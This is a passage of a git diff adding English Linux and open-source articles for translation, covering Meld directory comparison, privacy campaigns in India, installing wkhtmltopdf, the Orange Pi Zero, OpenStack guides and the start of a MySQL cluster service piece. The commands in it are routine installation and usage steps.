If you remember, in the beginner's tutorial, we mentioned that Meld can be used to compare both files as well as directories. Now that we've already covered file comparison, it's time to discuss the tool's directory comparison feature. + +_But before we do that it'd be worth sharing that all the instructions and examples presented in this tutorial have been tested on Ubuntu 14.04 and the Meld version we've used is 3.14.2._ + +### Compare directories using Meld + +To compare two directories using Meld, launch the tool and select the _Directory comparison_ option. + +[ + ![Compare directories using Meld](https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-3/meld-dir-comp-1.png) +][5] + +Then select the directories that you want to compare: + +[ + ![select the directories](https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-3/meld-sel-dir-2.png) +][6] + +Once that is done, click the _Compare_ button, and you'll see that Meld will compare both directories side by side, like the tool does in case of files: + +[ + ![Compare directories visually](https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-3/meld-dircomp-begins-3.png) +][7] + +Of course, these being directories, they are displayed as side-by-side trees. And as you can see in the screenshot above, the differences - whether it's a new file or a changed file -  are highlighted in different colors. + +According to Meld's official documentation, each file or folder that you see in the comparison area of the window has a state of its own. A state basically reveals how a particular file/folder is different from the corresponding entry in the other directory. + +The following table - taken from the tool's website - explains in details the folder comparison states in Meld. + +|**State** | **Appearance** | **Meaning** | +| --- | --- | --- | +| Same | Normal font | The file/folder is the same across all compared folders. | +| Same when filtered | Italics | These files are different across folders, but once text filters are applied, these files become identical. | +| Modified | Blue and bold | These files differ between the folders being compared. | +| New | Green and bold | This file/folder exists in this folder, but not in the others. | +| Missing | Greyed out text with a line through the middle | This file/folder doesn't exist in this folder, but does in one of the others. | +| Error | Bright red with a yellow background and bold | When comparing this file, an error occurred. The most common error causes are file permissions (i.e., Meld was not allowed to open the file) and filename encoding errors. | + +By default, Meld shows all the contents of the folders being compared, even if they are same (meaning there's no difference between them). However, you can ask the tool to not display these files/directories by clicking the _Same_ button in the toolbar - the click should disable this button. + +[ + ![same button](https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-3/meld-same-button.png) +][3] + +[ + ![Meld compare buttons](https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-3/meld-same-disabled.png) +][8] + +For example, here's our directory comparison when I clicked and disabled the _Same_ button: + +[ + ![Directory Comparison without same files](https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-3/meld-only-diff.png) +][9] + +So you can see that only the differences between the two directories (new and modified files) are shown now. Similarly, if you disable the _New_ button, only the modified files will be displayed. So basically, you can use these buttons to customize what kind of changes are displayed by Meld while comparing two directories. + +Coming to the changes, you can hop from one change to another using the up and down arrow keys that sit above the display area in the tool's window, and to open two files for side-by-side comparison, you can either double click the name of any of the files, or click the _Compare_ button that sits beside the arrows. + +[ + ![meld compare arrow keys](https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-3/meld-compare-arrows.png) +][10] + +**Note 1**: If you observe closely, there are bars on the left and right-hand sides of the display area in Meld window. These bars basically provide "a simple coloured summary of the comparison results." For each differing file or folder, there's a small colored section in these bars. You can click any such section to directly jump to that place in the comparison area. + +**Note 2**: While you can always open files side by side and merge changes the way you want, in case you want all the changes to be merged to the corresponding file/folder (meaning you want to make the corresponding file/folder exactly same) then you can use the _Copy Left_ and _Copy Right_ buttons: + +[ + ![meld copy right part](https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-3/meld-copy-right-left.png) +][11] + +For example, select a file or folder in the left pane and click the _Copy Right_ button to make the corresponding entry in the right pane exactly same. + +Moving on, there's a _Filters_ drop-down menu that sits just next to the _Same_, _New_, and _Modified_ trio of buttons. Here you can select/deselect file types to tell Meld whether or not to show these kind of files/folders in the display area during a directory comparison. The official documentation explains the entries in this menu as "patterns of filenames that will not be looked at when performing a folder comparison." + +The entries in the list include backups, OS-specific metadata, version control, binaries, and media. + +[ + ![Meld filters](https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-3/meld-filters.png) +][12] + +The aforementioned menu is also accessible by heading to _View->File Filters_. You can add new elements to this menu (as well as remove existing ones if you want) by going to _Edit->Preferences->File Filters_. + +[ + ![Meld preferences](https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-3/meld-edit-filters-menu.png) +][13] + +To create a new filter, you need to use shell glob patterns. Following is the list of shell glob characters that Meld recognises: + +| **Wildcard** | **Matches** | +| --- | --- | +| * | anything (i.e., zero or more characters) | +| ? | exactly one character | +| [abc] | any one of the listed characters | +| [!abc] | anything except one of the listed characters | +| {cat,dog} | either "cat" or "dog" | + +Finally, an important point worth knowing about Meld is that the case of a file's name plays an important part as comparison is case sensitive by default. This means that, for example, the files README, readme and ReadMe would all be treated by the tool as different files. + +Thankfully, however, Meld also provides you a way to turn off this feature. All you have to do is to head to the _View_ menu and then select the _Ignore Filename Case_ option. + +[ + ![Meld ignore filename case](https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-3/meld-ignore-case.png) +][14] + +### Conclusion + +As you'd agree, directory comparison using Meld isn't difficult - in fact I'd say it's pretty easy. The only area that might require time to learn is creating file filters, but that's not to say you should never learn it. Obviously, it all depends on what your requirement is.  + +Oh, and yes, you can even compare three directories using Meld, a feature that you can access by _clicking the 3-way comparison_ box when you choose the directories that you want to compare. We didn't discuss the feature in this article, but definitely will in one of our future articles. + +-------------------------------------------------------------------------------- + +via: https://www.howtoforge.com/tutorial/how-to-perform-directory-comparison-using-meld/ + +作者:[Ansh][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.howtoforge.com/tutorial/how-to-perform-directory-comparison-using-meld/ +[1]:https://www.howtoforge.com/tutorial/how-to-perform-directory-comparison-using-meld/#compare-directories-using-meld +[2]:https://www.howtoforge.com/tutorial/how-to-perform-directory-comparison-using-meld/#conclusion +[3]:https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-3/big/meld-same-button.png +[4]:https://www.howtoforge.com/tutorial/beginners-guide-to-visual-merge-tool-meld-on-linux/ +[5]:https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-3/big/meld-dir-comp-1.png +[6]:https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-3/big/meld-sel-dir-2.png +[7]:https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-3/big/meld-dircomp-begins-3.png +[8]:https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-3/big/meld-same-disabled.png +[9]:https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-3/big/meld-only-diff.png +[10]:https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-3/big/meld-compare-arrows.png +[11]:https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-3/big/meld-copy-right-left.png +[12]:https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-3/big/meld-filters.png +[13]:https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-3/big/meld-edit-filters-menu.png +[14]:https://www.howtoforge.com/images/beginners-guide-to-visual-merge-tool-meld-on-linux-part-3/big/meld-ignore-case.png diff --git a/sources/tech/20170128 How communities in India support privacy and software freedom.md b/sources/tech/20170128 How communities in India support privacy and software freedom.md new file mode 100644 index 0000000000..28e7adf42e --- /dev/null +++ b/sources/tech/20170128 How communities in India support privacy and software freedom.md @@ -0,0 +1,74 @@ +How communities in India support privacy and software freedom +============================================================ + + ![How communities in India support privacy and software freedom](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/people_remote_teams_world.png?itok=wI-GW8zX "How communities in India support privacy and software freedom") +Image by : opensource.com + +The free and open source communities in India, particularly Mozilla and Wikimedia communities, are leading two unique global events for better privacy and in support of free software. + +[January Privacy Month][3] is led by the Mozilla community in India to educate the masses about online privacy via both online and offline outreach events. And, [Freedom in Feb][4] is led by the [Centre for Internet and Society][5] to educate content producers like bloggers and photographers on how to donate their content under [open licenses][6]. + +### January Privacy Month + +Mozilla's January Privacy Month [began last year][7] to help celebrate the annual [Data Privacy Day][8]. In 2016, this campaign held several in-person and online events that reached [14,339,443 people across 10 countries][9]. "This was possible by sharing 1 privacy tip per day for 31 days throughout the month," says [Ankit Gadgil][10], one of the core organizers. "And this year, we have three focus areas. First of all, we have made this campaign more open and global. Mozilla communities from Brazil, Italy, and Czech Republic are actively participating this year. All essential documents is localized so that we can target more users. Secondly, We are educating participants of offline events about marketing Firefox and other Mozilla products so that the users can have hands-on experience of using these tools that help protect their privacy. The third thing is, we are encouraging everyone that participate an offline event to blog about their learning. For instance, there was a Maker Fest in in the Indian state of Gujarat recently where they used Mozilla products to teach about privacy." + +This year, the campaign continues to engage people at in-person and online events. Follow #PrivacyAware to engage. + +### Security tips + +Mozilla products like Firefox have a security settings—both [in built][11] and in the add-on library that are fully [accessible][12] to disabled people—that help protect user’s privacy and security, are all built collaboratively and are open source. + +[HTTPS Everywhere][13] can be used for [Chrome][14] and [Opera][15] to encrypt user communications so that external websites cannot see user's information. The project is built collaboratively by [The Tor Project][16] and the [Electronic Frontier Foundation][17]. + +### Freedom in February + +[Freedom in Feb][18] is an online campaign aimed at educating content creators about [free content][19] and show them how to contribute their work under free licenses.  + +**To participate:** + +* The works you will create or publish in February must be licensed under a [free license][1]. +* Content types include blog posts, other writings, and images. + +Creative works like multimedia, text-based content, art and design, etc. can be licensed under several [Creative Commons licenses][20] (CC), and other types of documents can be licensed under the [GNU Free Documentation Licenses][21] (GFDL). Good examples can be found on Wikipedia, where the content is licensed under both CC and GFDL licenses, allowing people to use, share, remix, and distribute derived work both commercially and non-commercially with attribution. Additionally, there are [free software licenses][22] that allow developers to share their software and software-related documentations. + +-------------------------------------------------------------------------------- + +作者简介: + +Subhashish Panigrahi - Subhashish Panigrahi (@subhapa) is the Asia Community Catalyzer at Mozilla's Participation team, and is transitioning from his role as Programme Officer of the Centre for Internet and Society's Access To Knowledge program Earlier with Wikimedia Foundation's India Program, he is an India based educator, + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/1/how-communities-india-support-privacy-software-freedom + +作者:[Subhashish Panigrahi][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/psubhashish +[1]:https://en.wikipedia.org/wiki/Free_license#Classification_and_licenses +[2]:https://opensource.com/article/17/1/how-communities-india-support-privacy-software-freedom?rate=WhGQOnXdk0m1Yq63nNe0wTVBP-75ALKLlrssFW2lCLk +[3]:https://wiki.mozilla.org/India/task_force/Policy_and_Advocacy/January_Privacy_Month_Campaign +[4]:http://www.freedominfeb.org/ +[5]:http://cis-india.org/ +[6]:https://opensource.com/education/16/8/3-copyright-tips-students-and-educators +[7]:https://reps.mozilla.org/e/privacy-month-campaign/ +[8]:https://en.wikipedia.org/wiki/Data_Privacy_Day +[9]:http://blog.mozillaindia.org/1611 +[10]:https://reps.mozilla.org/u/ankitgadgil +[11]:https://support.mozilla.org/en-US/products/firefox/protect-your-privacy +[12]:https://support.mozilla.org/en-US/kb/advanced-panel-settings-in-firefox +[13]:https://www.eff.org/files/https-everywhere-latest.xpi +[14]:https://chrome.google.com/webstore/detail/gcbommkclmclpchllfjekcdonpmejbdp +[15]:https://addons.opera.com/extensions/details/https-everywhere/ +[16]:https://www.torproject.org/ +[17]:https://eff.org/ +[18]:http://www.freedominfeb.org/ +[19]:https://en.wikipedia.org/wiki/Free_content +[20]:https://creativecommons.org/licenses/ +[21]:https://en.wikipedia.org/wiki/GNU_Free_Documentation_License +[22]:https://www.gnu.org/licenses/license-list.en.html#GPLCompatibleLicenses +[23]:https://opensource.com/user/21177/feed +[24]:https://opensource.com/users/psubhashish diff --git a/sources/tech/20170128 Wkhtmltopdf – A Smart Tool to Convert Website HTML Page to PDF in Linux.md b/sources/tech/20170128 Wkhtmltopdf – A Smart Tool to Convert Website HTML Page to PDF in Linux.md new file mode 100644 index 0000000000..f49a66bf10 --- /dev/null +++ b/sources/tech/20170128 Wkhtmltopdf – A Smart Tool to Convert Website HTML Page to PDF in Linux.md @@ -0,0 +1,212 @@ +Wkhtmltopdf – A Smart Tool to Convert Website HTML Page to PDF in Linux +============================================================ + +**Wkhtmltopdf** is an open source simple and much effective command-line shell utility that enables user to convert any given **HTML** (**Web Page**) to **PDF** document or an image (**jpg**, **png**, etc). + +Wkhtmltopdf is written in **C++** programming language and distributed under **GNU/GPL** (**General Public License**). It uses **WebKit** rendering layout engine to convert **HTML** pages to** PDF**document without loosing the quality of the pages. Its is really very useful and trustworthy solution for creating and storing snapshots of web pages in real-time. + +### Wkhtmltopdf Features + +1. Open source and cross platform. +2. Convert any **HTML** web pages to **PDF** files using **WebKit** engine. +3. Options to add headers and footers +4. Table of Content (**TOC**) generation option. +5. Provides batch mode conversions. +6. Support for **PHP** or **Python** via bindings to libwkhtmltox. + +In this article we will show you how to install **Wkhtmltopdf** program under Linux systems using source tarball files. + +### Install Evince (PDF Viewer) + +Let’s install **evince** (a **PDF** reader) program for viewing **PDF** files in Linux systems. + +``` +$ sudo yum install evince [RHEL/CentOS and Fedora] +$ sudo dnf install evince [On Fedora 22+ versions] +$ sudo apt-get install evince [On Debian/Ubuntu systems] +``` + +### Download Wkhtmltopdf Source File + +Download **wkhtmltopdf** source files for your **Linux** architecture using [Wget command][1], or you can also download latest versions (current stable series is **0.12.4**) at [wkhtmltopdf download][2] page. + +##### On 64-bit Linux OS + +``` +$ wget http://download.gna.org/wkhtmltopdf/0.12/0.12.4/wkhtmltox-0.12.4_linux-generic-amd64.tar.xz +``` + +##### On 32-bit Linux OS + +``` +$ wget http://download.gna.org/wkhtmltopdf/0.12/0.12.4/wkhtmltox-0.12.4_linux-generic-i386.tar.xz +``` + +### Install Wkhtmltopdf in Linux + +Extract the files to a current working directory using following [tar command][3]. + +``` +------ On 64-bit Linux OS ------ +$ sudo tar -xvf wkhtmltox-0.12.4_linux-generic-amd64.tar.xz +------ On 32-bit Linux OS ------ +$ sudo tar -xvzf wkhtmltox-0.12.4_linux-generic-i386.tar.xz +``` + +Install the **wkhtmltopdf** under **/usr/bin** directory for easy execution of program from any path. + +``` +$ sudo cp wkhtmltox/bin/wkhtmltopdf /usr/bin/ +``` + +### How to Use Wkhtmltopdf? + +Here we will see how to covert remote **HTML** pages to **PDF** files, verify information, view created files using **evince** program from the **GNOME** Desktop. + +#### Convert Website HTML Page to PDF File + +To convert any website **HTML** web page to **PDF**, run the following example command. It will convert the given webpage to [10-Sudo-Configurations.pdf][4] in current working directory. + +``` +# wkhtmltopdf http://www.tecmint.com/sudoers-configurations-for-setting-sudo-in-linux/ 10-Sudo-Configurations.pdf +``` + +##### Sample Output : + +``` +Loading pages (1/6) +Counting pages (2/6) +Resolving links (4/6) +Loading headers and footers (5/6) +Printing pages (6/6) +Done +``` + +#### View Generated PDF File + +To verify that the file is created, use the following command. + +``` +$ file 10-Sudo-Configurations.pdf +``` + +##### Sample Output : + +``` +10-Sudo-Configurations.pdf: PDF document, version 1.4 +``` + +#### View Information of Generated PDF File + +To view the information of generated file, issue the following command. + +``` +$ pdfinfo 10-Sudo-Configurations.pdf +``` + +##### Sample Output : + +``` +Title: 10 Useful Sudoers Configurations for Setting 'sudo' in Linux +Creator: wkhtmltopdf 0.12.4 +Producer: Qt 4.8.7 +CreationDate: Sat Jan 28 13:02:58 2017 +Tagged: no +UserProperties: no +Suspects: no +Form: none +JavaScript: no +Pages: 13 +Encrypted: no +Page size: 595 x 842 pts (A4) +Page rot: 0 +File size: 697827 bytes +Optimized: no +PDF version: 1.4 +``` + +#### View Created PDF File + +Take a look at the newly created **PDF** file using **evince** program from the desktop. + +``` +$ evince 10-Sudo-Configurations.pdf +``` + +##### Sample Screenshot : + +Looks pretty nice under my Linux Mint 17 box. + +[ + ![View Website Page in PDF](http://www.tecmint.com/wp-content/uploads/2012/10/View-Website-Page-in-PDF.png) +][5] + +View Website Page in PDF + +#### Create TOC (Table Of Content) of a Page to PDF + +To create a table of content for a **PDF** file, use the option as **toc**. + +``` +$ wkhtmltopdf toc http://www.tecmint.com/sudoers-configurations-for-setting-sudo-in-linux/ 10-Sudo-Configurations.pdf +``` + +##### Sample Output : + +``` +Loading pages (1/6) +Counting pages (2/6) +Loading TOC (3/6) +Resolving links (4/6) +Loading headers and footers (5/6) +Printing pages (6/6) +Done +``` + +To check the **TOC** for the created file, again use evince program. + +``` +$ evince 10-Sudo-Configurations.pdf +``` + +##### Sample Screenshot : + +Take a look at the picture below. it looks even more better than the above. + +[ + ![Create Website Page to Table of Contents in PDF](http://www.tecmint.com/wp-content/uploads/2012/10/Create-Website-Page-Table-of-Contents-in-PDF.png) +][6] + +Create Website Page to Table of Contents in PDF + +#### Wkhtmltopdf Options and Usage + +For **Wkhtmltopdf** more usage and options, use the following help command. It will display list of all available options that you can use with it. + +``` +$ wkhtmltopdf --help +``` + +-------------------------------------------------------------------------------- + +作者简介: + +I am Ravi Saive, creator of TecMint. A Computer Geek and Linux Guru who loves to share tricks and tips on Internet. Most Of My Servers runs on Open Source Platform called Linux. Follow Me: Twitter, Facebook and Google+ + +-------------------------------------------------- + +via: http://www.tecmint.com/wkhtmltopdf-convert-website-html-page-to-pdf-linux/ + +作者:[Ravi Saive][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.tecmint.com/author/admin/ +[1]:http://www.tecmint.com/10-wget-command-examples-in-linux/ +[2]:http://wkhtmltopdf.org/downloads.html +[3]:http://www.tecmint.com/18-tar-command-examples-in-linux/ +[4]:http://www.tecmint.com/sudoers-configurations-for-setting-sudo-in-linux/ +[5]:http://www.tecmint.com/wp-content/uploads/2012/10/View-Website-Page-in-PDF.png +[6]:http://www.tecmint.com/wp-content/uploads/2012/10/Create-Website-Page-Table-of-Contents-in-PDF.png diff --git a/sources/tech/20170130 How to get up and running with sweet Orange Pi.md b/sources/tech/20170130 How to get up and running with sweet Orange Pi.md new file mode 100644 index 0000000000..714fa7e5d7 --- /dev/null +++ b/sources/tech/20170130 How to get up and running with sweet Orange Pi.md @@ -0,0 +1,89 @@ + +beyondworld 翻译中 + +How to get up and running with sweet Orange Pi +============================================================ + + ![How to get up and running with sweet Orange Pi](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/the_orange_pi_zero.jpg?itok=00T8KODN "How to get up and running with sweet Orange Pi") +Image credits :  + +Dave Egts, CC BY-SA 4.0 + +As open source-powered hardware like [Arduino][2] and [Raspberry Pi][3] becomes more and more mainstream, its cost keeps dropping, which opens the door to new and innovative [IoT][4] and [STEM][5] applications. As someone who's passionate about both, I'm always on the lookout for new innovations that can be applied in industry, the classroom, and [my daughter's robotics team][6]. When I heard about the Orange Pi as being a "[Raspberry Pi killer][7]," I paused to take notice. + +Despite the sour sounding name, the Orange Pi Zero intrigued me. I recently got my hands on one and in this article share my first impressions. Spoiler alert: I was very impressed. + +### Why Orange Pi? + +Orange Pi is a family of Linux-powered, single board computers manufactured by [Shenzhen Xunlong Software Co., Limited][8], and [sold on AliExpress][9]. As with anything sold on AliExpress, be patient and plan ahead for shipping times of two to four or more weeks, because the products are shipped directly from mainland China to locations around the world. + +Unlike the Raspberry Pi, which has had a small but growing family of single board computers for different price points, form factors, and features, the number of Orange Pi boards is much larger. The good news is that you have a tremendous amount of choice in the application you want, but the bad news is that amount of choice could be overwhelming. In my case, I went with the [Orange Pi Zero][10] 512MB version, because it has the right balance of features and is priced for use in high school, academic environments. + +To see a high-resolution image with all the specs, go to the [Orange Pi Zero website][11]. + +Specifically, I needed the device to be as inexpensive as possible, but still useful out of the box, with Internet connectivity for SSH and IoT applications. The Orange Pi Zero meets these requirements by having onboard 10/100M Ethernet and 802.11 b/g/n Wi-Fi for Internet connectivity. It also has 26 Raspberry Pi-compatible [GPIO ports][12] for connecting sensors for IoT applications. I went with the 512MB version of the Orange Pi Zero over the 256MB version because more memory is typically better and it was only $2 more. Out the door, the unit was US $12.30 shipped, which makes it cost effective for classroom environments where experimentation and creating [magic smoke][13] is encouraged. + +Compared to a $5 [Raspberry Pi Zero][14], the Orange Pi Zero is only a few dollars more expensive, but it is much more useful out of the box because it has onboard Internet connectivity and four CPU cores instead of one. This onboard networking capability also makes the Orange Pi Zero a better gift than a Raspberry Pi Zero because the Raspberry Pi Zero needs Micro-USB-to-USB adapters and a Wi-Fi USB adapter to connect to the Internet. When giving IoT devices as gifts, you want the recipient to enjoy the product as quickly and easily as possible, instead of giving something incomplete that will just end up on a shelf. + +### Out of the box experience + +One of my initial concerns about the Orange Pi is that the vendor and community support wouldn't be as strong as the Raspberry Pi Foundation's and its community's support, leaving the end user all alone putting in extra effort to get the device going. If that's the case, I'd be reluctant to recommend the Orange Pi for classroom use or as a gift. The good news is that the Orange Pi Zero worked well right away and was actually easier to get going than a Raspberry Pi. + +The Orange Pi arrived in my mailbox two weeks after ordering. I unpacked it and got it up and running in a matter of minutes. Most of my time was spent downloading the operating system. The Orange Pi can run a variety of operating systems, ranging from Android to Debian variants. I went with [Armbian][15] as it appeared to be the most popular choice for Orange Pi enthusiasts. Since Armbian supports many ARM-based single-board computers, you need to select [the right Armbian build for the Orange Pi Zero][16]. By following the [Getting Started section][17] of the Armbian User Guide, I was easily able to image a microSD card, insert the microSD card and Ethernet cable, power the unit with an existing 3A Micro-USB power adapter I use with my Raspberry Pis, and SSH into it. + + ![Orange Pi interface](https://opensource.com/sites/default/files/orange_pi_screen_shot.png "Orange Pi interface") + +SSHing into the Orange Pi Zero. + +Once SSHed in via Ethernet, I was able to connect to my wireless access point easily using [nmtui-connect][18]. Then I performed an **apt-get update && apt-get upgrade** and noticed that the update ran much faster than a Raspberry Pi Zero and closer to the performance of a [Raspberry Pi 3][19]. Others have [observed similar results][20], too. It may not be as fast as a Raspberry Pi 3, but I wasn't planning to sequence genomes or mine Bitcoin with it. I also noticed that Armbian automatically resizes the root partition to fill the entire microSD card, which is an explicit, manual, and sometimes forgotten step when using Raspbian. Finally, for the US $12 price, three times as many students can learn on their own Orange Pi Zero as compared to a $35 Raspberry Pi 3, and you can give an Orange Pi Zero to three times as many friends. + + ![Orange Pi Form Factor](https://opensource.com/sites/default/files/the_orange_pi_zero_form_factor.jpg "Orange Pi Form Factor") + +The Orange Pi Zero form factor compared with the Raspberry Pi 3. + +### Closing thoughts + +The Orange Pi is definitely a solution looking for problems. Given its low cost, ability to get up and running quickly, relatively quick performance, and GPIO-pin compatibility with Raspberry Pi, the Orange Pi, and Orange Pi Zero in particular, should definitely be on your short list for experimentation in your workshop, classroom, or robot. + +Have you tried the Orange Pi? I'd love to hear about your experiences in the comments below. + +-------------------------------------------------------------------------------- + +作者简介: + +David Egts - David Egts | Chief Technologist, North America Public Sector, Red Hat. Drum playing, motorcycle riding, computer geek, husband, dad, and catechist. Follow me on Twitter at @davidegts and check out the podcast I co-host! + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/1/how-to-orange-pi + +作者:[David Egts][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/daveegts +[1]:https://opensource.com/article/17/1/how-to-orange-pi?rate=ZJsifrA90bn7TAU6NWgsxdYtRQjRhq5n7NiPZD8876M +[2]:https://en.wikipedia.org/wiki/Arduino +[3]:https://en.wikipedia.org/wiki/Raspberry_Pi +[4]:https://en.wikipedia.org/wiki/Internet_of_things +[5]:https://en.wikipedia.org/wiki/Science,_technology,_engineering,_and_mathematics +[6]:https://opensource.com/education/14/3/fighting-unicorns-robotics-team +[7]:http://sprtechuk.blogspot.com/2015/09/15-computer-orange-pi-pc-is-powerful.html +[8]:http://www.xunlong.tv/ +[9]:https://www.aliexpress.com/store/1553371 +[10]:http://www.orangepi.org/orangepizero/ +[11]:http://www.orangepi.org/orangepizero/ +[12]:http://linux-sunxi.org/Xunlong_Orange_Pi_Zero#Expansion_Port +[13]:https://en.wikipedia.org/wiki/Magic_smoke +[14]:https://www.raspberrypi.org/products/pi-zero/ +[15]:https://www.armbian.com/ +[16]:https://www.armbian.com/orange-pi-zero/ +[17]:https://docs.armbian.com/User-Guide_Getting-Started/ +[18]:https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/7/html/Networking_Guide/sec-Networking_Config_Using_nmtui.html +[19]:https://www.raspberrypi.org/products/raspberry-pi-3-model-b/ +[20]:https://openbenchmarking.org/result/1612154-TA-1603058GA04,1612151-MICK-MICKMAK70,1612095-TA-1603058GA97,1612095-TA-1603058GA50 +[21]:https://opensource.com/user/24799/feed +[22]:https://opensource.com/article/17/1/how-to-orange-pi#comments +[23]:https://opensource.com/users/daveegts diff --git a/sources/tech/20170131 5 new guides for working with OpenStack.md b/sources/tech/20170131 5 new guides for working with OpenStack.md new file mode 100644 index 0000000000..89e4a02a20 --- /dev/null +++ b/sources/tech/20170131 5 new guides for working with OpenStack.md @@ -0,0 +1,56 @@ +5 new guides for working with OpenStack +============================================================ + + ![OpenStack tutorials](https://opensource.com/sites/default/files/styles/image-full-size/public/images/education/rh_003588_01_rd3os.combacktoschoolserieshe_rh_051x_0.png?itok=Tm2UcSXw "OpenStack tutorials") +Image by : opensource.com + +OpenStack experience continues to be among the most in-demand skills in the tech world, with more and more organizations seeking to build and manage their own open source clouds. But OpenStack is a huge domain of knowledge, containing dozen of individual projects that are being actively developed at a rapid pace. Just keeping your skills up to date can be a challenge. + +The good news is that there are lots of resources out there to keep you up to speed. In addition to the [official project documentation][9], a variety training and certification programs, printed guides, and other resources, there are also a ton of tutorials and guides written by members of the OpenStack community and published across a variety of blogs and online publications. + +At Opensource.com, every month we gather the best of these community-created resources and bring them together for you into one handy package. Here's what we rounded up last month. + +* First up this time is a quick introduction to [Mistral usage in TripleO][1] from Julie Pichon. Mistral is a workflow service, allowing you to set up a multi-step process automation and coordinating actions for you asynchronously. Learn the basics of Mistral, how it works, and how it is used within TripleO in this quick guide. + +* Want to dig further into TripleO for managing OpenStack deployments using OpenStack's own set of tools? Then you'll want to check out this [set of cheatsheets][2] for people who are making use of TripleO in their OpenStack setup. It's a work in progress, so feel free to contribute if you've got an idea of what should be included. + +* Completing our trifecta of TripleO guides, don't miss this [quick guide][3] to using TripleO to stand up a standalone Ceph deployment. All it takes is a short YAML file and an easy command. + +* Next up, if you're an OpenStack contributor, you might be familiar with the [Grafana dashboard][4] which displays various metrics around OpenStack's continuous integration infrastructure. Ever wondered how this service works, or want to create a new addition to this dashboard? Learn [how to create][5] your own local copy of the dashboard for testing purposes so you can play around with it and create your own modifications. + +* Ever wonder what's happening under the hood with networking on an OpenStack cloud? OpenStack often makes use of [Open vSwitch][6] for network services for Neutron and Nova; learn the basics of how it is set up in [this walkthrough][7]. + +* * * + +That's it for this time around. As always, be sure to check out our complete collection of [OpenStack tutorials][10], which brings together hundreds of individual guides published across the past three years. + +-------------------------------------------------------------------------------- + +作者简介: + +Jason Baker - Jason is passionate about using technology to make the world more open, from software development to bringing sunlight to local governments. Linux desktop enthusiast. Map/geospatial nerd. Raspberry Pi tinkerer. Data analysis and visualization geek. Occasional coder. Cloud nativist. Follow him on Twitter. + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/1/openstack-tutorials + +作者:[Jason Baker][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/jason-baker +[1]:http://www.jpichon.net/blog/2016/12/quick-introduction-mistral-tripleo/ +[2]:http://www.anstack.com/blog/2016/12/16/printing-tripleo-cheat-sheet.html +[3]:http://giuliofidente.com/2016/12/tripleo-to-deploy-ceph-standlone.html +[4]:http://grafana.openstack.org/ +[5]:http://blog.cafarelli.fr/2016/12/local-testing-of-openstack-grafana-dashboard-changes/ +[6]:http://openvswitch.org/ +[7]:http://superuser.openstack.org/articles/openvswitch-openstack-sdn/ +[8]:https://opensource.com/article/17/1/openstack-tutorials?rate=q5H-KT2pm4NLExRhlHc0ru2dyjLkTSA45wim_2KtIec +[9]:http://docs.openstack.org/ +[10]:https://opensource.com/resources/openstack-tutorials +[11]:https://opensource.com/user/19894/feed +[12]:https://opensource.com/article/17/1/openstack-tutorials#comments +[13]:https://opensource.com/users/jason-baker diff --git a/sources/tech/20170131 Getting Started with MySQL Clusters as a Service.md b/sources/tech/20170131 Getting Started with MySQL Clusters as a Service.md new file mode 100644 index 0000000000..c00b10aa7b --- /dev/null +++ b/sources/tech/20170131 Getting Started with MySQL Clusters as a Service.md @@ -0,0 +1,84 @@ +Getting Started with MySQL Clusters as a Service +============================================================ + +[MySQL Cluster.me][1] starts offering **MySQL Clusters** and **MariaDB Clusters** as a service based on **Galera Replication** technology. + +In this article we will go through the main features of a **MySQL** and **MariaDB** clusters as a service. + +[ + ![MySQL Clusters as a Service](http://www.tecmint.com/wp-content/uploads/2017/01/MySQL-Clusters-Service.png) +][2] + +MySQL Clusters as a 